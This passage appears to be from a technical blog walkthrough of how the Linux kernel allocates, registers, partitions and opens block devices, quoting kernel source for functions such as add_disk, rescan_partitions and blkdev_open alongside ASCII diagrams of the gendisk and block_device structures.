<p>‘minors’ indicates the maximum number of minor devices; if it is one, the block device cannot be partitioned.</p>
<p>‘part_tbl’ holds the disk’s partition table info; its ‘part’ field points to the partitions.</p>
<p>‘queue’ holds the I/O requests for this block device.</p>
<p>‘part0’ is the first partition; if there is no partition it represents the whole device.</p>
<p>The block device driver allocates the gendisk and initializes its fields. A gendisk can represent a partitioned or an unpartitioned disk; when the driver calls ‘add_disk’ to add it to the system, the kernel decides whether to scan its partition table.</p>
<h3 id="struct-hd_struct">struct hd_struct</h3>
<p>‘hd_struct’ represents a partition info in a block device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct hd_struct {
sector_t start_sect;
/*
* nr_sects is protected by sequence counter. One might extend a
* partition while IO is happening to it and update of nr_sects
* can be non-atomic on 32bit machines with 64bit sector_t.
*/
sector_t nr_sects;
seqcount_t nr_sects_seq;
sector_t alignment_offset;
unsigned int discard_alignment;
struct device __dev;
struct kobject *holder_dir;
int policy, partno;
struct partition_meta_info *info;
#ifdef CONFIG_FAIL_MAKE_REQUEST
int make_it_fail;
#endif
unsigned long stamp;
atomic_t in_flight[2];
#ifdef CONFIG_SMP
struct disk_stats __percpu *dkstats;
#else
struct disk_stats dkstats;
#endif
atomic_t ref;
struct rcu_head rcu_head;
};
</code></pre></div></div>
<p>‘start_sect’, ‘nr_sects’ and ‘partno’ represent this partition’s start sector, number of sectors and partition number. ‘__dev’ means a partition is itself treated as a device.</p>
<h3 id="alloc_disk">alloc_disk</h3>
<p>‘alloc_disk’ can be used to allocate a gendisk struct and also do some initialization.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct gendisk *alloc_disk(int minors)
{
return alloc_disk_node(minors, NUMA_NO_NODE);
}
struct gendisk *alloc_disk_node(int minors, int node_id)
{
struct gendisk *disk;
disk = kzalloc_node(sizeof(struct gendisk), GFP_KERNEL, node_id);
if (disk) {
if (!init_part_stats(&disk->part0)) {
kfree(disk);
return NULL;
}
disk->node_id = node_id;
if (disk_expand_part_tbl(disk, 0)) {
free_part_stats(&disk->part0);
kfree(disk);
return NULL;
}
disk->part_tbl->part[0] = &disk->part0;
/*
* set_capacity() and get_capacity() currently don't use
* seqcounter to read/update the part0->nr_sects. Still init
* the counter as we can read the sectors in IO submission
* patch using seqence counters.
*
* TODO: Ideally set_capacity() and get_capacity() should be
* converted to make use of bd_mutex and sequence counters.
*/
seqcount_init(&disk->part0.nr_sects_seq);
hd_ref_init(&disk->part0);
disk->minors = minors;
rand_initialize_disk(disk);
disk_to_dev(disk)->class = &block_class;
disk_to_dev(disk)->type = &disk_type;
device_initialize(disk_to_dev(disk));
}
return disk;
}
int disk_expand_part_tbl(struct gendisk *disk, int partno)
{
struct disk_part_tbl *old_ptbl = disk->part_tbl;
struct disk_part_tbl *new_ptbl;
int len = old_ptbl ? old_ptbl->len : 0;
int target = partno + 1;
size_t size;
int i;
/* disk_max_parts() is zero during initialization, ignore if so */
if (disk_max_parts(disk) && target > disk_max_parts(disk))
return -EINVAL;
if (target <= len)
return 0;
size = sizeof(*new_ptbl) + target * sizeof(new_ptbl->part[0]);
new_ptbl = kzalloc_node(size, GFP_KERNEL, disk->node_id);
if (!new_ptbl)
return -ENOMEM;
new_ptbl->len = target;
for (i = 0; i < len; i++)
rcu_assign_pointer(new_ptbl->part[i], old_ptbl->part[i]);
disk_replace_part_tbl(disk, new_ptbl);
return 0;
}
</code></pre></div></div>
<p>The ‘minors’ argument of ‘alloc_disk’ indicates the maximum number of partitions this disk can have.
The heavy lifting is done in ‘alloc_disk_node’. ‘disk_expand_part_tbl’ allocates the gendisk’s part_tbl field, and the gendisk’s part0 is then assigned to disk-&gt;part_tbl-&gt;part[0]. part0 is an hd_struct and can also represent the whole disk device. Finally ‘alloc_disk’ does the routine work required by the device driver model.</p>
<h3 id="add_disk">add_disk</h3>
<p>After allocating the gendisk and do some initialization, we need add the gendisk to system. This is done by ‘add_disk’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void add_disk(struct gendisk *disk)
{
struct backing_dev_info *bdi;
dev_t devt;
int retval;
/* minors == 0 indicates to use ext devt from part0 and should
* be accompanied with EXT_DEVT flag. Make sure all
* parameters make sense.
*/
WARN_ON(disk->minors && !(disk->major || disk->first_minor));
WARN_ON(!disk->minors && !(disk->flags & GENHD_FL_EXT_DEVT));
disk->flags |= GENHD_FL_UP;
retval = blk_alloc_devt(&disk->part0, &devt);
if (retval) {
WARN_ON(1);
return;
}
disk_to_dev(disk)->devt = devt;
/* ->major and ->first_minor aren't supposed to be
* dereferenced from here on, but set them just in case.
*/
disk->major = MAJOR(devt);
disk->first_minor = MINOR(devt);
disk_alloc_events(disk);
/* Register BDI before referencing it from bdev */
bdi = &disk->queue->backing_dev_info;
bdi_register_dev(bdi, disk_devt(disk));
blk_register_region(disk_devt(disk), disk->minors, NULL,
exact_match, exact_lock, disk);
register_disk(disk);
blk_register_queue(disk);
/*
* Take an extra ref on queue which will be put on disk_release()
* so that it sticks around as long as @disk is there.
*/
WARN_ON_ONCE(!blk_get_queue(disk->queue));
retval = sysfs_create_link(&disk_to_dev(disk)->kobj, &bdi->dev->kobj,
"bdi");
WARN_ON(retval);
disk_add_events(disk);
}
</code></pre></div></div>
<p>For block devices, the major number identifies the device driver and the minor number identifies a partition managed by that driver. ‘blk_alloc_devt’ generates the block device’s device number.
‘blk_register_region’ is a very important function: it adds the block device to the system just as the char device code does, inserting the devt into the global variable ‘bdev_map’.
Next is ‘register_disk’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void register_disk(struct gendisk *disk)
{
struct device *ddev = disk_to_dev(disk);
struct block_device *bdev;
struct disk_part_iter piter;
struct hd_struct *part;
int err;
ddev->parent = disk->driverfs_dev;
dev_set_name(ddev, "%s", disk->disk_name);
/* delay uevents, until we scanned partition table */
dev_set_uevent_suppress(ddev, 1);
if (device_add(ddev))
return;
if (!sysfs_deprecated) {
err = sysfs_create_link(block_depr, &ddev->kobj,
kobject_name(&ddev->kobj));
if (err) {
device_del(ddev);
return;
}
}
/*
* avoid probable deadlock caused by allocating memory with
* GFP_KERNEL in runtime_resume callback of its all ancestor
* devices
*/
pm_runtime_set_memalloc_noio(ddev, true);
disk->part0.holder_dir = kobject_create_and_add("holders", &ddev->kobj);
disk->slave_dir = kobject_create_and_add("slaves", &ddev->kobj);
/* No minors to use for partitions */
if (!disk_part_scan_enabled(disk))
goto exit;
/* No such device (e.g., media were just removed) */
if (!get_capacity(disk))
goto exit;
bdev = bdget_disk(disk, 0);
if (!bdev)
goto exit;
bdev->bd_invalidated = 1;
err = blkdev_get(bdev, FMODE_READ, NULL);
if (err < 0)
goto exit;
blkdev_put(bdev, FMODE_READ);
exit:
/* announce disk after possible partitions are created */
dev_set_uevent_suppress(ddev, 0);
kobject_uevent(&ddev->kobj, KOBJ_ADD);
/* announce possible partitions */
disk_part_iter_init(&piter, disk, 0);
while ((part = disk_part_iter_next(&piter)))
kobject_uevent(&part_to_dev(part)->kobj, KOBJ_ADD);
disk_part_iter_exit(&piter);
}
</code></pre></div></div>
<p>The first part does the device model operations. The most important is ‘device_add’; after this function there will be a node under /dev, /dev/ramhda for example.
‘disk_part_scan_enabled’ returns false if the disk cannot be partitioned, in which case ‘register_disk’ exits. Otherwise it goes ahead.
‘bdget_disk’ obtains a ‘block_device’, which is a very important struct:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct block_device *bdget_disk(struct gendisk *disk, int partno)
{
struct hd_struct *part;
struct block_device *bdev = NULL;
part = disk_get_part(disk, partno);
if (part)
bdev = bdget(part_devt(part));
disk_put_part(part);
return bdev;
}
EXPORT_SYMBOL(bdget_disk);
struct block_device *bdget(dev_t dev)
{
struct block_device *bdev;
struct inode *inode;
inode = iget5_locked(blockdev_superblock, hash(dev),
bdev_test, bdev_set, &dev);
if (!inode)
return NULL;
bdev = &BDEV_I(inode)->bdev;
if (inode->i_state & I_NEW) {
bdev->bd_contains = NULL;
bdev->bd_super = NULL;
bdev->bd_inode = inode;
bdev->bd_block_size = (1 << inode->i_blkbits);
bdev->bd_part_count = 0;
bdev->bd_invalidated = 0;
inode->i_mode = S_IFBLK;
inode->i_rdev = dev;
inode->i_bdev = bdev;
inode->i_data.a_ops = &def_blk_aops;
mapping_set_gfp_mask(&inode->i_data, GFP_USER);
inode->i_data.backing_dev_info = &default_backing_dev_info;
spin_lock(&bdev_lock);
list_add(&bdev->bd_list, &all_bdevs);
spin_unlock(&bdev_lock);
unlock_new_inode(inode);
}
return bdev;
}
struct inode *iget5_locked(struct super_block *sb, unsigned long hashval,
int (*test)(struct inode *, void *),
int (*set)(struct inode *, void *), void *data)
{
struct hlist_head *head = inode_hashtable + hash(sb, hashval);
struct inode *inode;
spin_lock(&inode_hash_lock);
inode = find_inode(sb, head, test, data);
spin_unlock(&inode_hash_lock);
if (inode) {
wait_on_inode(inode);
return inode;
}
inode = alloc_inode(sb);
if (inode) {
struct inode *old;
spin_lock(&inode_hash_lock);
/* We released the lock, so.. */
old = find_inode(sb, head, test, data);
if (!old) {
if (set(inode, data))
goto set_failed;
spin_lock(&inode->i_lock);
inode->i_state = I_NEW;
hlist_add_head(&inode->i_hash, head);
spin_unlock(&inode->i_lock);
inode_sb_list_add(inode);
spin_unlock(&inode_hash_lock);
/* Return the locked inode with I_NEW set, the
* caller is responsible for filling in the contents
*/
return inode;
}
/*
* Uhhuh, somebody else created the same inode under
* us. Use the old inode instead of the one we just
* allocated.
*/
spin_unlock(&inode_hash_lock);
destroy_inode(inode);
inode = old;
wait_on_inode(inode);
}
return inode;
set_failed:
spin_unlock(&inode_hash_lock);
destroy_inode(inode);
return NULL;
}
</code></pre></div></div>
<p>Here ‘iget5_locked’ uses the global variable ‘blockdev_superblock’ as the superblock and finally calls blockdev_superblock-&gt;s_op-&gt;alloc_inode, which is actually ‘bdev_alloc_inode’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static struct inode *bdev_alloc_inode(struct super_block *sb)
{
struct bdev_inode *ei = kmem_cache_alloc(bdev_cachep, GFP_KERNEL);
if (!ei)
return NULL;
return &ei->vfs_inode;
}
struct bdev_inode {
struct block_device bdev;
struct inode vfs_inode;
};
</code></pre></div></div>
<p>From this we know that ‘iget5_locked’ returns the inode embedded in a ‘bdev_inode’ struct, and from that inode we can get the ‘block_device’ field ‘bdev’.
Inside ‘iget5_locked’, ‘bdev_set’ is called, which sets ‘bdev.bd_dev’ to the disk’s device number.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int bdev_set(struct inode *inode, void *data)
{
BDEV_I(inode)->bdev.bd_dev = *(dev_t *)data;
return 0;
}
</code></pre></div></div>
<p>After getting the ‘block_device’, ‘register_disk’ sets ‘bdev-&gt;bd_invalidated’ to 1, which gives the kernel a chance to scan this disk again.
Next it calls ‘blkdev_get’, which in turn calls ‘__blkdev_get’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int blkdev_get(struct block_device *bdev, fmode_t mode, void *holder)
{
struct block_device *whole = NULL;
int res;
WARN_ON_ONCE((mode & FMODE_EXCL) && !holder);
if ((mode & FMODE_EXCL) && holder) {
whole = bd_start_claiming(bdev, holder);
if (IS_ERR(whole)) {
bdput(bdev);
return PTR_ERR(whole);
}
}
res = __blkdev_get(bdev, mode, 0);
if (whole) {
struct gendisk *disk = whole->bd_disk;
/* finish claiming */
mutex_lock(&bdev->bd_mutex);
spin_lock(&bdev_lock);
if (!res) {
BUG_ON(!bd_may_claim(bdev, whole, holder));
/*
* Note that for a whole device bd_holders
* will be incremented twice, and bd_holder
* will be set to bd_may_claim before being
* set to holder
*/
whole->bd_holders++;
whole->bd_holder = bd_may_claim;
bdev->bd_holders++;
bdev->bd_holder = holder;
}
/* tell others that we're done */
BUG_ON(whole->bd_claiming != holder);
whole->bd_claiming = NULL;
wake_up_bit(&whole->bd_claiming, 0);
spin_unlock(&bdev_lock);
/*
* Block event polling for write claims if requested. Any
* write holder makes the write_holder state stick until
* all are released. This is good enough and tracking
* individual writeable reference is too fragile given the
* way @mode is used in blkdev_get/put().
*/
if (!res && (mode & FMODE_WRITE) && !bdev->bd_write_holder &&
(disk->flags & GENHD_FL_BLOCK_EVENTS_ON_EXCL_WRITE)) {
bdev->bd_write_holder = true;
disk_block_events(disk);
}
mutex_unlock(&bdev->bd_mutex);
bdput(whole);
}
return res;
}
</code></pre></div></div>
<p>‘__blkdev_get’ is very long. Here we will follow the first-open path, as it first calls:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __blkdev_get(struct block_device *bdev, fmode_t mode, int for_part)
{
struct gendisk *disk;
struct module *owner;
int ret;
int partno;
int perm = 0;
...
ret = -ENXIO;
disk = get_gendisk(bdev->bd_dev, &partno);
if (!disk)
goto out;
owner = disk->fops->owner;
disk_block_events(disk);
mutex_lock_nested(&bdev->bd_mutex, for_part);
if (!bdev->bd_openers) {
bdev->bd_disk = disk;
bdev->bd_queue = disk->queue;
bdev->bd_contains = bdev;
if (!partno) {
struct backing_dev_info *bdi;
ret = -ENXIO;
bdev->bd_part = disk_get_part(disk, partno);
if (!bdev->bd_part)
goto out_clear;
ret = 0;
if (disk->fops->open) {
ret = disk->fops->open(bdev, mode);
if (ret == -ERESTARTSYS) {
/* Lost a race with 'disk' being
* deleted, try again.
* See md.c
*/
disk_put_part(bdev->bd_part);
bdev->bd_part = NULL;
bdev->bd_disk = NULL;
bdev->bd_queue = NULL;
mutex_unlock(&bdev->bd_mutex);
disk_unblock_events(disk);
put_disk(disk);
module_put(owner);
goto restart;
}
}
if (!ret) {
bd_set_size(bdev,(loff_t)get_capacity(disk)<<9);
bdi = blk_get_backing_dev_info(bdev);
if (bdi == NULL)
bdi = &default_backing_dev_info;
bdev_inode_switch_bdi(bdev->bd_inode, bdi);
}
/*
* If the device is invalidated, rescan partition
* if open succeeded or failed with -ENOMEDIUM.
* The latter is necessary to prevent ghost
* partitions on a removed medium.
*/
if (bdev->bd_invalidated) {
if (!ret)
rescan_partitions(disk, bdev);
else if (ret == -ENOMEDIUM)
invalidate_partitions(disk, bdev);
}
if (ret)
goto out_clear;
}
...
bdev->bd_openers++;
if (for_part)
bdev->bd_part_count++;
mutex_unlock(&bdev->bd_mutex);
disk_unblock_events(disk);
return 0;
out_clear:
disk_put_part(bdev->bd_part);
bdev->bd_disk = NULL;
bdev->bd_part = NULL;
bdev->bd_queue = NULL;
bdev_inode_switch_bdi(bdev->bd_inode, &default_backing_dev_info);
if (bdev != bdev->bd_contains)
__blkdev_put(bdev->bd_contains, mode, 1);
bdev->bd_contains = NULL;
out_unlock_bdev:
mutex_unlock(&bdev->bd_mutex);
disk_unblock_events(disk);
put_disk(disk);
module_put(owner);
out:
bdput(bdev);
return ret;
}
</code></pre></div></div>
<p>First it gets the gendisk; here we see how the device number bdev-&gt;bd_dev is used.
Then it sets some fields of bdev, and ‘bdev-&gt;bd_part’ points to ‘disk-&gt;part0’.
Then it calls ‘disk-&gt;fops-&gt;open(bdev, mode);’.
The next important function is ‘rescan_partitions’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int rescan_partitions(struct gendisk *disk, struct block_device *bdev)
{
struct parsed_partitions *state = NULL;
struct hd_struct *part;
int p, highest, res;
rescan:
if (state && !IS_ERR(state)) {
free_partitions(state);
state = NULL;
}
res = drop_partitions(disk, bdev);
if (res)
return res;
if (disk->fops->revalidate_disk)
disk->fops->revalidate_disk(disk);
check_disk_size_change(disk, bdev);
bdev->bd_invalidated = 0;
if (!get_capacity(disk) || !(state = check_partition(disk, bdev)))
return 0;
if (IS_ERR(state)) {
/*
* I/O error reading the partition table. If any
* partition code tried to read beyond EOD, retry
* after unlocking native capacity.
*/
if (PTR_ERR(state) == -ENOSPC) {
printk(KERN_WARNING "%s: partition table beyond EOD, ",
disk->disk_name);
if (disk_unlock_native_capacity(disk))
goto rescan;
}
return -EIO;
}
/*
* If any partition code tried to read beyond EOD, try
* unlocking native capacity even if partition table is
* successfully read as we could be missing some partitions.
*/
if (state->access_beyond_eod) {
printk(KERN_WARNING
"%s: partition table partially beyond EOD, ",
disk->disk_name);
if (disk_unlock_native_capacity(disk))
goto rescan;
}
/* tell userspace that the media / partition table may have changed */
kobject_uevent(&disk_to_dev(disk)->kobj, KOBJ_CHANGE);
/* Detect the highest partition number and preallocate
* disk->part_tbl. This is an optimization and not strictly
* necessary.
*/
for (p = 1, highest = 0; p < state->limit; p++)
if (state->parts[p].size)
highest = p;
disk_expand_part_tbl(disk, highest);
/* add partitions */
for (p = 1; p < state->limit; p++) {
sector_t size, from;
struct partition_meta_info *info = NULL;
size = state->parts[p].size;
if (!size)
continue;
from = state->parts[p].from;
if (from >= get_capacity(disk)) {
printk(KERN_WARNING
"%s: p%d start %llu is beyond EOD, ",
disk->disk_name, p, (unsigned long long) from);
if (disk_unlock_native_capacity(disk))
goto rescan;
continue;
}
if (from + size > get_capacity(disk)) {
printk(KERN_WARNING
"%s: p%d size %llu extends beyond EOD, ",
disk->disk_name, p, (unsigned long long) size);
if (disk_unlock_native_capacity(disk)) {
/* free state and restart */
goto rescan;
} else {
/*
* we can not ignore partitions of broken tables
* created by for example camera firmware, but
* we limit them to the end of the disk to avoid
* creating invalid block devices
*/
size = get_capacity(disk) - from;
}
}
if (state->parts[p].has_info)
info = &state->parts[p].info;
part = add_partition(disk, p, from, size,
state->parts[p].flags,
&state->parts[p].info);
if (IS_ERR(part)) {
printk(KERN_ERR " %s: p%d could not be added: %ld\n",
disk->disk_name, p, -PTR_ERR(part));
continue;
}
#ifdef CONFIG_BLK_DEV_MD
if (state->parts[p].flags & ADDPART_FLAG_RAID)
md_autodetect_dev(part_to_dev(part)->devt);
#endif
}
free_partitions(state);
return 0;
}
</code></pre></div></div>
<p>It calls ‘check_partition’. Every partition recognition function lives in the global variable ‘check_part’; if there is no partition table on the disk, it prints ‘unknown partition table’.
What if there are partitions on this disk? It calls ‘disk_expand_part_tbl’ to expand ‘gendisk-&gt;part_tbl’, then calls ‘add_partition’ to add each partition device to the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct hd_struct *add_partition(struct gendisk *disk, int partno,
sector_t start, sector_t len, int flags,
struct partition_meta_info *info)
{
struct hd_struct *p;
dev_t devt = MKDEV(0, 0);
struct device *ddev = disk_to_dev(disk);
struct device *pdev;
struct disk_part_tbl *ptbl;
const char *dname;
int err;
err = disk_expand_part_tbl(disk, partno);
if (err)
return ERR_PTR(err);
ptbl = disk->part_tbl;
if (ptbl->part[partno])
return ERR_PTR(-EBUSY);
p = kzalloc(sizeof(*p), GFP_KERNEL);
if (!p)
return ERR_PTR(-EBUSY);
if (!init_part_stats(p)) {
err = -ENOMEM;
goto out_free;
}
seqcount_init(&p->nr_sects_seq);
pdev = part_to_dev(p);
p->start_sect = start;
p->alignment_offset =
queue_limit_alignment_offset(&disk->queue->limits, start);
p->discard_alignment =
queue_limit_discard_alignment(&disk->queue->limits, start);
p->nr_sects = len;
p->partno = partno;
p->policy = get_disk_ro(disk);
if (info) {
struct partition_meta_info *pinfo = alloc_part_info(disk);
if (!pinfo)
goto out_free_stats;
memcpy(pinfo, info, sizeof(*info));
p->info = pinfo;
}
dname = dev_name(ddev);
if (isdigit(dname[strlen(dname) - 1]))
dev_set_name(pdev, "%sp%d", dname, partno);
else
dev_set_name(pdev, "%s%d", dname, partno);
device_initialize(pdev);
pdev->class = &block_class;
pdev->type = &part_type;
pdev->parent = ddev;
err = blk_alloc_devt(p, &devt);
if (err)
goto out_free_info;
pdev->devt = devt;
/* delay uevent until 'holders' subdir is created */
dev_set_uevent_suppress(pdev, 1);
err = device_add(pdev);
if (err)
goto out_put;
err = -ENOMEM;
p->holder_dir = kobject_create_and_add("holders", &pdev->kobj);
if (!p->holder_dir)
goto out_del;
dev_set_uevent_suppress(pdev, 0);
if (flags & ADDPART_FLAG_WHOLEDISK) {
err = device_create_file(pdev, &dev_attr_whole_disk);
if (err)
goto out_del;
}
/* everything is up and running, commence */
rcu_assign_pointer(ptbl->part[partno], p);
/* suppress uevent if the disk suppresses it */
if (!dev_get_uevent_suppress(ddev))
kobject_uevent(&pdev->kobj, KOBJ_ADD);
hd_ref_init(p);
return p;
out_free_info:
free_part_info(p);
out_free_stats:
free_part_stats(p);
out_free:
kfree(p);
return ERR_PTR(err);
out_del:
kobject_put(p->holder_dir);
device_del(pdev);
out_put:
put_device(pdev);
blk_free_devt(devt);
return ERR_PTR(err);
}
</code></pre></div></div>
<p>First it allocates a ‘hd_struct’ to hold this partition’s information. The kernel treats every partition as a separate device, so each ‘add_partition’ call invokes ‘device_add’ to register the partition with the system, which results in a node under /dev/, such as /dev/ramhda1 or /dev/ramhda2. Notice there is no ‘block_device’ for the partition yet.</p>
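<p>The dev_set_name branch in ‘add_partition’ above encodes a small naming rule: if the disk name ends in a digit, a ‘p’ separates the disk name from the partition number. Here is a userspace replica of just that rule (‘part_name’ is my own helper name, not a kernel function):</p>

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Reproduce add_partition()'s naming rule: a disk name ending in a
 * digit gets a 'p' separator (mmcblk0 -> mmcblk0p1); otherwise the
 * partition number is appended directly (sda -> sda1). */
void part_name(char *buf, size_t len, const char *dname, int partno)
{
    if (isdigit((unsigned char)dname[strlen(dname) - 1]))
        snprintf(buf, len, "%sp%d", dname, partno);
    else
        snprintf(buf, len, "%s%d", dname, partno);
}
```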
<p>After call ‘register_disk’ in ‘add_disk’, it calls ‘blk_register_queue’. This function initialize the disk’s request queue.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int blk_register_queue(struct gendisk *disk)
{
int ret;
struct device *dev = disk_to_dev(disk);
struct request_queue *q = disk->queue;
if (WARN_ON(!q))
return -ENXIO;
/*
* Initialization must be complete by now. Finish the initial
* bypass from queue allocation.
*/
blk_queue_bypass_end(q);
queue_flag_set_unlocked(QUEUE_FLAG_INIT_DONE, q);
ret = blk_trace_init_sysfs(dev);
if (ret)
return ret;
ret = kobject_add(&q->kobj, kobject_get(&dev->kobj), "%s", "queue");
if (ret < 0) {
blk_trace_remove_sysfs(dev);
return ret;
}
kobject_uevent(&q->kobj, KOBJ_ADD);
if (q->mq_ops)
blk_mq_register_disk(disk);
if (!q->request_fn)
return 0;
ret = elv_register_queue(q);
if (ret) {
kobject_uevent(&q->kobj, KOBJ_REMOVE);
kobject_del(&q->kobj);
blk_trace_remove_sysfs(dev);
kobject_put(&dev->kobj);
return ret;
}
return 0;
}
</code></pre></div></div>
<p>Though this queue is what will later carry the device’s requests, at this point its initialization just registers it with the standard device model (kobjects, sysfs entries and uevents).</p>
<p>So ‘add_disk’ adds the disk to the system. The following structures have been created.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> block_device
+---------------+ <--+
+--------------------------------------+ bd_part | |
| +---------------+ |
| +-------------------------+ bd_disk | |
| | +---------------+ |
| | | bd_contains +----+
| | +---------------+
| | |bd_invalidated=0
| | +---------------+
| | |bd_openers=1 |
| | +---------------+
| |
| |
| |
| |
| v
| gendisk
| +-------------------+
| | |
| +-------------------+ disk_part_tbl
| | *part_tbl +------------> +---------------+
| +-------------------+ | |
| | | +---------------+
| | | | len |
| | | +---------------+
| | | | |
| | | +---------------+
+---------> +-------------------+ <------------+ *part[0] |
part0 | start_sect | +---------------+ hd_struct
+-------------------+ | *part[1] +----------> +---------------+
| nr_sects | +---------------+ | start_sect |
+-------------------+ +---------------+
| __dev | | nr_sects |
+-------------------+ +---------------+
| partno=0 | | partno=1 |
+-------------------+ +---------------+
| | | |
| | +---------------+
| |
| |
+-------------------+
</code></pre></div></div>
<h3 id="open-block-device">open block device</h3>
<p>When we add a device to the system, a node in /dev/ is created; this is done in ‘devtmpfs_create_node’. The node is created by devtmpfs, and when its inode is created, ‘init_special_inode’ is called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void init_special_inode(struct inode *inode, umode_t mode, dev_t rdev)
{
inode->i_mode = mode;
if (S_ISCHR(mode)) {
inode->i_fop = &def_chr_fops;
inode->i_rdev = rdev;
} else if (S_ISBLK(mode)) {
inode->i_fop = &def_blk_fops;
inode->i_rdev = rdev;
} else if (S_ISFIFO(mode))
inode->i_fop = &pipefifo_fops;
else if (S_ISSOCK(mode))
inode->i_fop = &bad_sock_fops;
else
printk(KERN_DEBUG "init_special_inode: bogus i_mode (%o) for"
" inode %s:%lu\n", mode, inode->i_sb->s_id,
inode->i_ino);
}
</code></pre></div></div>
<p>So the inode’s ‘i_fop’ will be ‘def_blk_fops’.</p>
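<p>‘init_special_inode’ also stores the device number in ‘i_rdev’. Userspace can build and split such a number with the standard makedev()/major()/minor() macros; the 8:1 pair below is just an illustrative major:minor choice:</p>

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/sysmacros.h>

/* Build a device number the way i_rdev holds one. Thin wrapper around
 * makedev() so the round trip through major()/minor() is visible. */
dev_t make_rdev(unsigned int maj, unsigned int min)
{
    return makedev(maj, min);
}
```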
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const struct file_operations def_blk_fops = {
.open = blkdev_open,
.release = blkdev_close,
.llseek = block_llseek,
.read = do_sync_read,
.write = do_sync_write,
.aio_read = blkdev_aio_read,
.aio_write = blkdev_aio_write,
.mmap = generic_file_mmap,
.fsync = blkdev_fsync,
.unlocked_ioctl = block_ioctl,
#ifdef CONFIG_COMPAT
.compat_ioctl = compat_blkdev_ioctl,
#endif
.splice_read = generic_file_splice_read,
.splice_write = generic_file_splice_write,
};
</code></pre></div></div>
<p>When this block device such as /dev/ramhda is opened, ‘blkdev_open’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int blkdev_open(struct inode * inode, struct file * filp)
{
struct block_device *bdev;
/*
* Preserve backwards compatibility and allow large file access
* even if userspace doesn't ask for it explicitly. Some mkfs
* binary needs it. We might want to drop this workaround
* during an unstable branch.
*/
filp->f_flags |= O_LARGEFILE;
if (filp->f_flags & O_NDELAY)
filp->f_mode |= FMODE_NDELAY;
if (filp->f_flags & O_EXCL)
filp->f_mode |= FMODE_EXCL;
if ((filp->f_flags & O_ACCMODE) == 3)
filp->f_mode |= FMODE_WRITE_IOCTL;
bdev = bd_acquire(inode);
if (bdev == NULL)
return -ENOMEM;
filp->f_mapping = bdev->bd_inode->i_mapping;
return blkdev_get(bdev, filp->f_mode, filp);
}
</code></pre></div></div>
<p>This function does two things: it gets the ‘block_device’ bdev using ‘bd_acquire’ and then calls ‘blkdev_get’.
‘bd_acquire’ returns an existing ‘block_device’ when the whole disk is opened; otherwise it creates a new ‘block_device’. Either way, ‘bd_acquire’ returns a ‘block_device’.
The next function is ‘blkdev_get’, which was discussed before; it calls ‘__blkdev_get’. This time we will look at a different path: opening a partition of a disk, with partno 1.
First, ‘__blkdev_get’ gets the gendisk.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (!bdev->bd_openers) {
bdev->bd_disk = disk;
bdev->bd_queue = disk->queue;
bdev->bd_contains = bdev;
...
struct block_device *whole;
whole = bdget_disk(disk, 0);
ret = -ENOMEM;
if (!whole)
goto out_clear;
BUG_ON(for_part);
ret = __blkdev_get(whole, mode, 1);
if (ret)
goto out_clear;
bdev->bd_contains = whole;
bdev_inode_switch_bdi(bdev->bd_inode,
whole->bd_inode->i_data.backing_dev_info);
bdev->bd_part = disk_get_part(disk, partno);
if (!(disk->flags & GENHD_FL_UP) ||
!bdev->bd_part || !bdev->bd_part->nr_sects) {
ret = -ENXIO;
goto out_clear;
}
bd_set_size(bdev, (loff_t)bdev->bd_part->nr_sects << 9);
}
</code></pre></div></div>
<p>Then it gets the gendisk’s block_device and assigns it to ‘whole’, which is later assigned to ‘bdev->bd_contains’.
Then it calls ‘__blkdev_get(whole, mode, 1);’, which reaches this code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
if (bdev->bd_contains == bdev) {
ret = 0;
if (bdev->bd_disk->fops->open)
ret = bdev->bd_disk->fops->open(bdev, mode);
/* the same as first opener case, read comment there */
if (bdev->bd_invalidated) {
if (!ret)
rescan_partitions(bdev->bd_disk, bdev);
else if (ret == -ENOMEDIUM)
invalidate_partitions(bdev->bd_disk, bdev);
}
if (ret)
goto out_unlock_bdev;
}
</code></pre></div></div>
<p>This mostly just calls ‘bd_disk->fops->open’.
So here we can see that every disk has a ‘block_device’, created when ‘add_disk’ is called. For a partition, the kernel doesn’t create a ‘block_device’ when detecting it and inserting it into the system; it is created when the partition is first opened.
The following picture shows the partition’s ‘block_device’ and the gendisk’s ‘block_device’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> block_device
+---------------+ <--+ <-----------------------------------+
+--------------------------------------+ bd_part | | |
| +---------------+ | |
| +-------------------------+ bd_disk | | |
| | +---------------+ | |
| | | bd_contains +----+ |
| | +---------------+ |
| | |bd_invalidated=0 |
| | +---------------+ |
| | |bd_openers=1 | block_device |
| | +---------------+ +---------------+ |
| | +----+ bd_part | |
| | | +---------------+ |
| | +---------------------------------------+ bd_disk | |
| | | | +---------------+ |
| v v | | bd_contains +--------+
| gendisk | +---------------+
| +-------------------+ | |bd_invalidated=
| | | | +---------------+
| +-------------------+ disk_part_tbl | |bd_openers=1 |
| | *part_tbl +------------> +---------------+ | +---------------+
